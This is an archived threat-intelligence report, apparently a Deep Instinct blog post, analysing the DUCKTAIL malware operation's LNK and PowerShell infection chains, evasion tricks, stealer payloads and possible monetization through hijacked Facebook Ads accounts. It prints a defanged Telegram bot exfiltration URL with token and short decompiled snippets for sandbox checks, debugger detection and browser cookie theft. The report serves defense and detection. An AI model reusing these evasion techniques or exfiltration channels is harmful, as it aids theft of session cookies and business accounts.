{
	"id": "f5fe1567-49c7-44de-9123-3c22e44433ba",
	"created_at": "2026-04-06T00:10:05.996214Z",
	"updated_at": "2026-04-10T03:21:29.619794Z",
	"deleted_at": null,
	"sha1_hash": "f01a2b3e625b88918ef39df54697e4b6d231c5b2",
	"title": "DUCKTAIL: Threat Operation Re-emerges with New LNK, PowerShell, and Other Custom Tactics to Avoid Detection | Deep Instinct",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3686089,
	"plain_text": "DUCKTAIL: Threat Operation Re-emerges with New LNK, PowerShell,\r\nand Other Custom Tactics to Avoid Detection | Deep Instinct\r\nBy Simon KeninThreat Intelligence ResearcherDeep Instinct Threat Lab\r\nPublished: 2023-03-09 · Archived: 2026-04-05 20:24:42 UTC\r\nDUCKTAIL is the name given to a malware operation that was previously focused on targeting individuals and\r\norganizations that operate on Facebook’s Business Ads platform\r\nThe initial infection starts with a malicious LNK that executes PowerShell to download malware hosted on a public\r\nfile-sharing service\r\nThe DUCKTAIL operation has changed their custom malware to be compiled as a .NET Core 5\r\nThe final payload has been changed from custom-made malware to commodity malware during the experimental\r\nphase\r\nWithSecure reported on the DUCKTAIL operation in two separate reports in 2022 (1, 2).\r\nShortly after the first publication, which carefully detailed their TTPs, the threat operation went silent.\r\nAfter the publication revealed their tactics for a second time, they again went silent. It was at this time that Deep Instinct\r\nobserved the operation experimenting with changing the initial infection from an archive containing a malicious executable\r\nto an archive containing a malicious LNK file that would start the infection chain (we’ll describe this below).\r\nDeep Instinct observed the operation becoming operational again at the beginning of February 2023.\r\nInitial Experiments Observed by Deep Instinct\r\nIn October 2022 the DUCKTAIL operation was observed by the Threat Reseach team at Deep Instinct pushing their custom\r\n.NET malware in their usual infection chain, as was described by WithSecure in the previously mentioned reports.\r\nThe payload with the hash 27c76c08e4d3a17056e0d22cbe1f6e59 was signed by a now-revoked certificate for a fake\r\nbusiness created by the threat actor:\r\nFigure 1: Signed DUCKTAIL malware with now-revoked certificate.\r\nThe payload was inside an archive (870dc03ba3120e4ecfb799b519ec1a50) with decoy images and videos:\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 1 of 9\n\nFigure 2: Directory tree inside the archive file containing malware and decoy files.\r\nAs described by WithSecure, the malware exfiltrated data via a Telegram bot, in this case via an HTTP request to:\r\nhxxps://api.telegram.org/bot5448616453:AAHJdBSZdnpmhl5_xYzf0uL-clkJzggXCSw/sendMessage\r\nThe exact same payload was observed in parallel in another infection chain that Deep Instinct determined was used for\r\ntesting purposes to bypass detections and improve the number of successful infections.\r\nWhile the final payload is the same, the new alternative infection chain began with an archive\r\n(ece3728e2893c9dd70fb519ac80070b6) containing only an LNK file without any decoy files.\r\nThe LNK file is calling PowerShell to download and execute another PowerShell script which is hosted on Discord:\r\nFigure 3: LNK file contents.\r\nThe PowerShell command inside the LNK is lightly obfuscated using simple tricks like adding quotes, concatenation, and\r\nstring replace which are used to bypass static detections.\r\nThe downloaded 2nd-stage PowerShell (238fbb5ac0af956e8d07cf0f716e0d83) is also lightly obfuscated using the same\r\nreplace trick plus a custom function for download and execution which should bypass some static detections.\r\nWhen executed, the 2nd-stage PowerShell downloads the exact same signed payload\r\n(27c76c08e4d3a17056e0d22cbe1f6e59) which has been observed in the old infection chain. Additionally, a benign archive\r\nfile with decoy files is also downloaded. Both files are hosted on Discord. Finally, the 2nd-stage PowerShell deletes the\r\ninitial LNK file to cover its tracks:\r\nFigure 4: 2nd-stage PowerShell script contents.\r\nDeep Instinct Observes More DUCKTAIL Experiments:\r\nFrom November to December 2022 the DUCKTAIL operation seemed to have switched solely to the LNK infection chain\r\nwhile continuing to experiment with it. We observed the following experiments:\r\nInflation of LNK files:\r\nThe LNK file (5da77aeb1d6ec4d7c9b8408cab3feecc) has a size of almost 300 MB.\r\nWhile the functionality is the same as the previous LNK file, this file has zero bytes appended to it. This technique is\r\ngrowing in popularity among threat actors because of file-size limits at various vendors and sandboxes.\r\nChange to initial PowerShell command inside LNK:\r\nThe initial PowerShell script inside the LNK files has been completely changed to heavily rely on concatenation with the\r\ncombination of extracting a single character from the “$PSHOME” variable.\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 2 of 9\n\nThe “$PSHOME” in PowerShell translates to the directory where “powershell.exe” is located, for example\r\n“C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\.”\r\nBelow is an example of an extracted and edited version of a new LNK (e03635ef5c57b4884f619108499971e4):\r\nFigure 5: New PowerShell script with added analysis comments\r\nChanges to public hosting storage:\r\nAt first, the DUCKTAIL operation used Discord to host the next stages of the attack. At some point the operation shifted to\r\nother public storage providers such as “transfer.sh,” GitHub, and Google Drive.\r\nAdditionally, the use of dedicated attacker-controlled domains were observed (see appendix).\r\nOne such example is the domain “techhint24[.]com” which is shown in figure 5.\r\nPreviously, WithSecure observed archives with the malicious executable hosted at Dropbox, iCloud, and MediaFire. In\r\naddition, Deep Instinct observed the current archives with LNK hosted at attacker-controlled domains and in free\r\nsubdomains that would redirect to DropBox, such as status-refund-taxes[.]web[.]app which been observed by\r\n@JAMESWT_MHT:\r\nFigure 6: Redirect to download file from DropBox found at “status-refund-taxes[.]web[.]app”\r\nChanges to final payload:\r\nDuring infection chain experiments the threat actor used their own custom .NET malware, likely due to the revocation of\r\ntheir certificate and the growing detection rate for the malware. At some point the operation switched to different payloads.\r\nIn the example shown in figure 7, the payload was Doenerium stealer. In other instances, Vidar stealer was observed. This\r\nchange might indicate that threat actor is exploring new ways to monetize their attacks.\r\nBack to Action – New wave of attack in February 2023:\r\nAfter doing the experiments at the end of 2022, there was no sign of new activity in 2023 until the middle of February.\r\nThe operation is back with an infection chain that combines all the features in the experiments, while the final payload is\r\nonce again the custom malware with yet another new valid certificate:\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 3 of 9\n\nFigure 7: New certificate information.\r\nThe actor made an OpSec mistake and added the email address of a domain that was registered by him at\r\ncakoithaivuong[.]site.\r\nIn addition to the new LNK infection chain, the old infection chain consisting of archives containing malicious executables\r\nand decoy files is also active.\r\nIn this wave, the custom DUCKTAIL malware functionality remains the same but is being distributed as a 64bit .NET Core\r\n5 binary:\r\nFigure 8: Metadata of new DUCKTAIL binary showing it is a .NET Core 5 binary.\r\nIn case you missed the previous reports on DUCKTAIL, the purpose of the malware is to steal browser cookies and\r\nexfiltrate them through Telegram. If a Facebook session cookie is found, the malware checks if the Facebook account is a\r\nbusiness account. If it is, the malware tries to add the attacker’s email as an admin and finance editor.\r\nBelow is a scheme showing the new DUCKTAIL infection chain:\r\nFigure 9: Illustration of new DUCKTAIL infection chain\r\nAdditional Information:\r\nDelivery mechanism:\r\nWithSecure initially observed that individuals have been targeted via LinkedIn. During our research, we have identified two\r\nthreads in Reddit (1, 2) which discuss a suspicious LNK file that is spread via link to an archive hosted on Google drive. The\r\nlink is added to various threads on Reddit as can be seen in archived version of one of those posts.\r\nMonetization:\r\nWhile WithSecure detailed the malware functionality which specifically targets the Facebook Ads platform there is a\r\nmissing piece on what the threat actor does once they gain access to business Facebook Ads accounts.\r\nWhile it might be possible to get the credit card information that is used for paying for ads in the compromised accounts this\r\ndoesn’t seem plausible. There are far better, cheaper, and easier ways to gain credit card information.\r\nOne of the initial samples (138831ebee49d667748c4babe5ea2445) has been inside an archive\r\n(7e8f1c84347586e8b9b62d7493c6017c). This archive has been hosted on the domain aicokgroup[.]com.\r\nWe have identified the following Facebook page that lists this domain as their homepage:\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 4 of 9\n\nFigure 10: Facebook page with aicokgroup[.]com\r\nOne of the posts has an Amazon short URL which is no longer active. An archived version shows that the link is for AICOK\r\nJuicer machine:\r\nFigure 11: Amazon item from link in Facebook group.\r\nWhile we are not sure whether AICOK is a real company or a shell company made by the threat actor, their items seem to be\r\n“white label” products. For example, the same juicer is listed now as another brand on Amazon:\r\nFigure 12: Amazon listing for same item but a different brand.\r\nOn the same Facebook page there is another post which is a job ad for a Facebook Ads Manager:\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 5 of 9\n\nFigure 13: Facebook post for Facebook Ads Manager.\r\nWhile investigating the AICOK lead, we came across another Facebook page which is related to AICOK with a nearly\r\nidentical post. The only difference is that this page had a different domain:\r\nFigure 14: Another Facebook post for Facebook Ads Manager. Comment mentions this is a virus.\r\nThe second domain, aicok[.]cc, no longer exists. However, there is a similar domain (aicook[.]cc) which redirects to\r\naicookhome[.]com. We have found another Facebook page which contains those domains:\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 6 of 9\n\nFigure 15: Facebook page of AICOOK\r\nThe page mentions that there were scams on Facebook for their brand “AICOOK,” while the DUCKTAIL Facebook pages\r\nare called “AICOK.”\r\nSince we have only identified one such instance, we can’t assess exactly whether this is a one-time event or whether this is\r\nthe usual operational method of DUCKTAIL.\r\nThere could a couple theories for what could be happening:\r\n1. Pure scam – AICOK was imitating AICOOK. DUCKTAIL would buy Ads for “AICOK” and unsuspecting victims\r\nwould order items and never receive them. In addition, the fake shop would look for Ad Managers while infecting\r\nthem with malware.\r\n2. Drop shipping / Affiliate program / White-label sale – AICOOK has an affiliate program. DUCKTAIL have pushed\r\nads from stolen Facebook Ads accounts to promote the sale of various items. As seen in figures 9 and 10, the AICOK\r\nitem price is much higher, although it is the same item. The reason for this could be that either they directly sold the\r\nwhite-label item from the factory as the AICOK brand mimicking AICOOK, or they did drop shipping for AICOOK\r\nitems, buying them at the original price and selling at a much higher price for profit. Or simply as an affiliate and\r\ngained revenue from every item sold while maximizing the profit by pushing a lot of ads from compromised\r\nFacebook Ads accounts.\r\nMITRE ATT\u0026CK:\r\nTactic Technique Description Observable\r\nDiscovery\r\nT1057\r\nProcess\r\nDiscovery\r\nIf there are\r\nless than 150\r\nrunning\r\nprocesses the\r\nmalware\r\nwon’t\r\nexecute.\r\nbool flag = Process.GetProcesses().Count() \u003e 150;\r\nT1012 Query\r\nRegistry\r\nMalware\r\ntries to\r\nidentify\r\ndefault\r\nbrowser.\r\nregistryKey = Registry.LocalMachine.OpenSubKey(\"SOFTWARE\\\\Clients\\\\StartMenuInternet\");\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 7 of 9\n\nTactic Technique Description Observable\r\nT1083 File\r\nand Directory\r\nDiscovery\r\nMalware\r\ntries to steal\r\nbrowser\r\ncookies from\r\nspecific\r\nlocations.\r\nstring text = Path.Combine(Environment.GetFolderPath(26), \"Mozilla\\\\Firefox\\\\Profiles\");\r\nT1622\r\nDebugger\r\nEvasion\r\nMalware\r\nchecks if\r\ndebugger is\r\npresent.\r\nbool flag = DataChecker.DetectDebugger() || DataChecker.DetectSandboxie();\r\nT1016.001\r\nSystem\r\nNetwork\r\nConfiguration\r\nDiscovery:\r\nInternet\r\nConnection\r\nDiscovery\r\nMalware\r\ntries to ping\r\nIP address in\r\nHEX format\r\nto check\r\ninternet\r\nconnectivity.\r\nPingReply pingReply = ping.Send(text, num, array, pingOptions); Console.WriteLine(\"This environm\r\nDefense\r\nEvasion\r\nT1027.001\r\nObfuscated\r\nFiles or\r\nInformation:\r\nBinary\r\nPadding\r\nLNK files\r\nare\r\nartificially\r\ninflated to\r\nthe size of\r\n~300mb\r\n4bef9919457b22db15a8f40277c451973007547820fa7cd009ee9aa038f3cfd5\r\nExfiltration\r\nT1567\r\nExfiltration\r\nOver Web\r\nService\r\nMalware\r\nuses\r\nTelegram\r\nAPI to\r\nexfiltrate\r\ndata\r\nhxxps://api.telegram.org/bot5448616453:AAHJdBSZdnpmhl5_xYzf0uL-clkJzggXCSw/sendMessage\r\nT1587.001\r\nDevelop\r\nCapabilities:\r\nMalware\r\nDUCKTAIL\r\ncustom .NET\r\nmalware\r\n312e8a10903141991d4d3c4571b16fc4528b62a324ff4336daa56ac93292cb40\r\nT1588.003\r\nObtain\r\nCapabilities:\r\nCode Signing\r\nCertificates\r\nThreat actor\r\ncreated fake\r\norganizations\r\nand received\r\ncertificates\r\nfor them\r\nwhile\r\nsigning\r\nmalware.\r\n312e8a10903141991d4d3c4571b16fc4528b62a324ff4336daa56ac93292cb40 signed by “CONG TY T\r\nInitial\r\nAccess\r\nT1566 .002\r\nPhishing:\r\nSpearphishing\r\nLink\r\nThreat actor\r\nposted links\r\nto archives\r\nwith\r\nmalicious\r\nhttps://web.archive.org/web/20221201234010/https:/www.reddit.com/r/BitcoinMining/comments/za1\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 8 of 9\n\nTactic Technique Description Observable\r\nLNK files on\r\nReddit\r\nExecution\r\nT1204.002\r\nUser\r\nExecution:\r\nMalicious\r\nFile\r\nDUCKTAIL\r\ncustom .NET\r\nmalware\r\n312e8a10903141991d4d3c4571b16fc4528b62a324ff4336daa56ac93292cb40\r\nCredential\r\nAccess\r\nT1539 Steal\r\nWeb Session\r\nCookie\r\nMalware\r\nsteals\r\ncookies from\r\nlocal\r\nbrowsers\r\nbool flag2 = Directory.GetFiles(text2).Any((string a) =\u003e Path.GetFileName(a) == \"cookies.sqlite\");\r\nIOCs\r\nThe full list of IOCs can be found on our GitHub: https://github.com/deepinstinct/DuckTail_IOCs\r\nSource: https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection"
	],
	"report_names": [
		"ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection"
	],
	"threat_actors": [],
	"ts_created_at": 1775434205,
	"ts_updated_at": 1775791289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f01a2b3e625b88918ef39df54697e4b6d231c5b2.pdf",
		"text": "https://archive.orkl.eu/f01a2b3e625b88918ef39df54697e4b6d231c5b2.txt",
		"img": "https://archive.orkl.eu/f01a2b3e625b88918ef39df54697e4b6d231c5b2.jpg"
	}
}